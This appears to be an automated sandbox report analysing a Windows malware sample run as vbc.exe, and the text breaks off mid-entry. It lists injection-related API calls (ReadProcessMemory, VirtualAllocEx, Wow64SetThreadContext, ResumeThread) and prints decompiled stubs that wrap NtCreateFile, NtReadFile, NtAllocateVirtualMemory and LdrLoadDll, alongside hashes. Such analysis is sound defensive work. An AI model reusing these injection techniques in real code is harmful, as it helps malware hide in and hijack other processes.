Instruction ID: 1db4832c64eb65ddb2642c0e6ebcdc4347206c95dc84afa9d81ffd1760e7e6dd
Opcode Fuzzy Hash: ad6aac7eb034b574d3581993a0236d40d76b2074cdb4896b36a9df9d11183080
Instruction Fuzzy Hash: CB41B8B4D002489FCF00CFA9D884AEEBBF1BF49304F24942AE814B7200D774AA55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0025BEF0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025BFA2

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0fc277f7701642907c008bdd45a218b00157aefecd1732485094e06be0f98dae
Instruction ID: c56e89bdd5a190af3752691a923632195ff1836494758a7fb37531e8604829fd
Opcode Fuzzy Hash: 0fc277f7701642907c008bdd45a218b00157aefecd1732485094e06be0f98dae
Instruction Fuzzy Hash: 8C41B8B5D042589FCF00CFA9D884AEEFBB1BF49310F20942AE814B7200D775A955CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0025BC68, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025BD12

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cc295272930a94b09bfb05beccae5d670f4f8e424f76ca514ef6a8dd2ff04f5b
Instruction ID: 348dae5f971abec7abfdb3c882272110dd212d6bb8194dd0a090e6766be4d8fa
Opcode Fuzzy Hash: cc295272930a94b09bfb05beccae5d670f4f8e424f76ca514ef6a8dd2ff04f5b
Instruction Fuzzy Hash: 804199B5D042589BCF10CFA9D884AEEBBB1FF49310F20942AE815B7210D775A915CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0025BB38, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025BBE7

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1f3644f5fa8d6acec830442c8c47a41f7764d1fa69a9e5fdc0d40e528e6cbe63
Instruction ID: ad945e26fd6c2398291d2935c81d100712fdb6dab2dfca9639270d8addb8ebfb
Opcode Fuzzy Hash: 1f3644f5fa8d6acec830442c8c47a41f7764d1fa69a9e5fdc0d40e528e6cbe63
Instruction Fuzzy Hash: 0C41CCB4D102189FCB10CFA9D884AEEFBB1BF49314F24842AE814B7240D778A949CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0025BA48, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0025BAC6

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b413ed1ecdf107ef47bd728dd32040cb5b5659edfc7656b5bf11738136e998a1
Instruction ID: 56ad37d354ac726dcdb3d35ae99661e135ea2d3447348cc2fb5c4d841ab12902
Opcode Fuzzy Hash: b413ed1ecdf107ef47bd728dd32040cb5b5659edfc7656b5bf11738136e998a1
Instruction Fuzzy Hash: 7831B9B4D042189FCF14CFA9E884AAEFBB5BF49314F14942AE815B7300D775A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc872d69ff4aa0093bba98ba36493c5c6e37a8a2d7fa2850282ab73a0770dfa4
Instruction ID: 3d918b142f2c872d3761e6215313ad9b4c4615093fa310acc8c095cf5c6441c5
Opcode Fuzzy Hash: bc872d69ff4aa0093bba98ba36493c5c6e37a8a2d7fa2850282ab73a0770dfa4
Instruction Fuzzy Hash: 4621F271608248EFDB05DF14E980B2ABBB1FF88314F24C6A9E90D5B246C736D807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0017D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ae055e37acc7caf6c43a92195ee578870144ecc40bf7a1d6f08f857d602543
Instruction ID: 949054c66b3c022d8a67b5653294cc8c7cb2935169906b5f9f8aad65d4954267
Opcode Fuzzy Hash: 88ae055e37acc7caf6c43a92195ee578870144ecc40bf7a1d6f08f857d602543
Instruction Fuzzy Hash: 3B21F275608248DFCB14DF14E884B2ABB71EF88314F34C569E90D4B246C736D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0017D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa96cf0f6e996c19eca2ce5ed6362864ad49ad4db955588aa39112c0c3a4192
Instruction ID: 5a283bd1473881619eeda958203450e179181e0c35ea4cb785e9870bba71357e
Opcode Fuzzy Hash: faa96cf0f6e996c19eca2ce5ed6362864ad49ad4db955588aa39112c0c3a4192
Instruction Fuzzy Hash: CA215E755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
Instruction ID: 63bb12b906815e47b78eaf3f5f8095fa320b1a16b69d618b529de92af085efd9
Opcode Fuzzy Hash: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
Instruction Fuzzy Hash: 87118B75544284DFCB16CF10E5C4B15BFB1FF85314F28C6A9D8494B656C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0016D1C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478034909.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ed97e8d6b3eaa2ee02e8c1a9e0f03c90a3dfbc1d13188769312167f7a04a07
Instruction ID: 34c26859fc86342d4ae07b0640dd64adeadc98f7fe6c87d90f12eab6f66723aa
Opcode Fuzzy Hash: a9ed97e8d6b3eaa2ee02e8c1a9e0f03c90a3dfbc1d13188769312167f7a04a07
Instruction Fuzzy Hash: 2901A7319087449ADB508A26EC84B6BBBD8EF51724F15C45EEE045B182D374DC45C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0016D1C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478034909.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1874f5268fb45a2eca95007c534bbf9b389bdecbc2ac7a64935e22cf448d371
Instruction ID: a4e1ebdbcf2c9a32cfe85356065f7aca21fd157de49f385541529967f644d32a
Opcode Fuzzy Hash: d1874f5268fb45a2eca95007c534bbf9b389bdecbc2ac7a64935e22cf448d371
Instruction Fuzzy Hash: 0FF06272504644ABEB508A15DC88B63FFD8EF51724F28C55EED085B282D379DC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002548B8, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c71493366b1e3e810b1051e5240141e03479a163d996cd09674ef59d3931054
Instruction ID: 8ddea4007564ea994230c0ae343b625961a46ab2e450b50a34658a8d0e527ae1
Opcode Fuzzy Hash: 2c71493366b1e3e810b1051e5240141e03479a163d996cd09674ef59d3931054
Instruction Fuzzy Hash: F6513F309142488BD748EFB5EC81AAD7BF3FBC9304F008529D108AF6A4DB71598ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00254AF7, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2913772dd3e30b4b02a9445150045c6220c9c36eafa0e4a70755b1bef9d1be8d
Instruction ID: 87245c5834d1a4687827c72d28fa56d29f79f4ff894d6531668348d9b2d2b805
Opcode Fuzzy Hash: 2913772dd3e30b4b02a9445150045c6220c9c36eafa0e4a70755b1bef9d1be8d
Instruction Fuzzy Hash: 9B4148B1E156588BEB1CCF6B8D4069EFAF3AFC5204F14C1BAC54DA6265EB3005868F15

Uniqueness

Uniqueness Score: -1.00%

Function 00254B08, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011dbbac59cb53dc98d9b695dbc41077c484bb0491c54b7171bcaa1cacaaa5cd
Instruction ID: c29ebaf08b40d2825179b494f7eecdc008e38fc3a323593dd542c20b76d73bda
Opcode Fuzzy Hash: 011dbbac59cb53dc98d9b695dbc41077c484bb0491c54b7171bcaa1cacaaa5cd
Instruction Fuzzy Hash: A44146B1E156188BEB1CCF6B8D4069EFAF3AFC9304F14C1BA894CA6214EB3005868F15

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 1988 Parent PID: 2628 vbc.exeCOMMON

Executed Functions

Function 00418660, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191B0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418663
0x0041866f
0x00418677
0x0041867c
0x00418682
0x0041869d
0x004186a5
0x004186a9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5

Strings

!:A, xrefs: 0041867C, 00418688
b=A, xrefs: 00418682, 00418690
b=A, xrefs: 0041869D, 004186A4

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B360(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004196F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185AA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004185AA(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				asm("aaa");
				_t17 = _a4;
				_t4 = _t17 + 0xc40; // 0xc40
				E004191B0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x004185aa
0x004185b3
0x004185bf
0x004185c7
0x004185fd
0x00418601

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
Instruction ID: 18cb8f29c1dbb9be036894fa1e0555e78b2193662c4237a168eb9084fb89eb18
Opcode Fuzzy Hash: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
Instruction Fuzzy Hash: DA01BDB6241208AFDB48DF88DC95EEB77A9AF8C354F158258FA1D97240D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191B0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185bf
0x004185c7
0x004185fd
0x00418601

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041878A, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041878A(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;
				void* _t21;

				asm("aad 0x9d");
				asm("daa");
				asm("salc");
				_pop(ss);
				asm("ficom dword [ebp-0x75]");
				_t10 = _a8;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191B0(_t21, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}

0x0041878a
0x0041878c
0x0041878d
0x0041878e
0x0041878f
0x00418793
0x0041879f
0x004187a7
0x004187c9
0x004187cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
Instruction ID: 713eb8c923aafab32c3c2070b3ea3110a2081d86b7d44ffaf67b656759256371
Opcode Fuzzy Hash: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
Instruction Fuzzy Hash: D0F058B2200118AFCB24DF99CC81EEB77ADAF8C354F108208FA09A7241C631E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004186DA, Relevance: 1.5, APIs: 1, Instructions: 32
nativeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004186DA(void* __edx, void* __eflags, long _a4, void* _a8) {
				intOrPtr _v117;
				long* __esi;
				signed char _t6;
				void* _t11;

				asm("int 0xe7");
				asm("std");
				if(__eflags < 0) {
					return  *(_t6 | 0x0000008b)(__edx, es, _t11);
				} else {
					__eflags = __edx - _v117;
					__ebp = __esp;
					__eax = _a4;
					_t3 = __eax + 0x10; // 0x300
					_t4 = __eax + 0xc50; // 0x409753
					__esi = _t4;
					__eax = E004191B0(__edi, _a4, __esi,  *_t3, 0, 0x2c);
					__edx = _a8;
					__eax =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x004186da
0x004186dc
0x004186dd
0x004186d9
0x004186df
0x004186df
0x004186e1
0x004186e3
0x004186e6
0x004186ef
0x004186ef
0x004186f7
0x004186fc
0x004186ff
0x00418705
0x00418707
0x00418708
0x00418709
0x00418709

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
Instruction ID: 1851d21db6e1e0e433705d8b9bc6f96ef1dce32e760053031ea60e7465d993b7
Opcode Fuzzy Hash: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
Instruction Fuzzy Hash: 41E068722001007BDB10EBE8DC85EEB772CDF84354F11416EF90CE7202CA30E2408AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00418790, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041879f
0x004187a7
0x004187c9
0x004187cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004186E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004186E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191B0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004186e3
0x004186e6
0x004186ef
0x004186f7
0x00418705
0x00418709

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4

Uniqueness

Uniqueness Score: -1.00%

Function 008800C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008800CF

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00880048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00880053

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00880078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00880086

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 0087F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087F9FB

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0087F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087F90E

Memory Dump Source

